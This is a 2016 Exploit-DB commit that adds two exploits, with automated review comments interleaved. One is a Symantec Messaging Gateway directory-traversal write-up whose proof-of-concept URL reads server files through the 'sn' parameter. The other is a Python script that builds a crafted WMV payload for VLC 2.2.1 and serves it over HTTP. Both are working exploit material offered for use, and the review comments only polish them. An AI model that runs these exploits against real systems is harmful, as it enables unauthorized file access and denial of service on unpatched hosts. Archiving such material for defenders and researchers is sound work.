DB: 2016-09-29

2 new exploits

Symantec Messaging Gateway 10.6.1 - Directory Traversal

VLC Media Player 2.2.1 - Buffer Overflow
Offensive Security 2016-09-29 05:01:16 +00:00
parent f421077feb
commit d86bdf5f80
3 changed files with 93 additions and 0 deletions


@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port
38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
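Review bot: The new 40437 row in the first hunk is inserted between ids 38919 and 38920, while the 40439 row in the second hunk is appended after 40436 at the tail of the file; the surrounding rows in both hunks run in ascending id order, so the 40437 row appears to belong directly before 40439 as well. Moving it there keeps the index sortable by id and avoids a 2016 entry sitting among the 2015 entries. The rest of the file is not rendered on this page, so the ordering elsewhere is inferred from these two hunks only.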



@ -0,0 +1,53 @@
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"
if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.
if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}
POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
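Review bot: The comment attached to the `getAttribute` line claims that call is where the unsanitised `sn` value enables the traversal, but `ServletContext.getAttribute` looks up a named entry in the servlet context's attribute map rather than opening a path, so the quoted `doGet` by itself shows no filesystem sink; the traversal presumably occurs where that attribute is populated from the charting request, which is not quoted here. The write-up would be clearer if it either quoted that code or reworded the comment to `//**** The raw "sn" value is used as the attribute key here; the path handling lives where this attribute is stored`. The quoted `doGet` is also cut off before its closing braces, so the remainder of the method is outside the hunk. The linked vendor advisory is the authoritative fix reference for readers assessing exposure.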

38
platforms/windows/dos/40439.py Executable file

@ -0,0 +1,38 @@
Exploit Title: VLC Media Player 2.2.1 Buffer Overflow
2016-09-28
Author: sultan albalawi
Software Link: https://www.videolan.org/vlc/releases/2.2.1.html
Tested on:win7
video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater&notif_t=video_processed&notif_id=1475012468070044
*************************************************************************************
filecreate = "payload.wmv" # create file (payload.wmv)
buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+
"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+
"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+
"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+
"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+
"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+
"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+
"\x32\x30\x78\x33\x36\x30\r\n")
buffer += filecreate
open(filecreate, "wb").write(buffer)
print "create file done {}".format(filecreate)
import BaseHTTPServer
import sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
if sys.argv[1:]:
port = int(sys.argv[1])
else:
port =8080
server_address = ('192.168.100.3',8080)
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print sa[0],sa[1],filecreate
print "open vlc and open file {}".format(filecreate)
print "LISTENING..",sa[0],sa[1],filecreate
httpd.serve_forever()
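Review bot: The `port` parsed from `sys.argv` is never used: `server_address` hard-codes both the interface and `8080`, so a port given on the command line silently has no effect; it should read `server_address = ('192.168.100.3', port)`. The payload file is also written through a handle that is never closed on the `open(filecreate, "wb").write(buffer)` line; `with open(filecreate, "wb") as f:` followed by `f.write(buffer)` releases it deterministically. The script is Python 2 only (`print` statements, `BaseHTTPServer`, `SimpleHTTPServer`), which is worth stating in the header since those modules do not exist under Python 3. The bound address is a private LAN IP specific to the author's test setup and should be documented or taken as an argument rather than left as a literal.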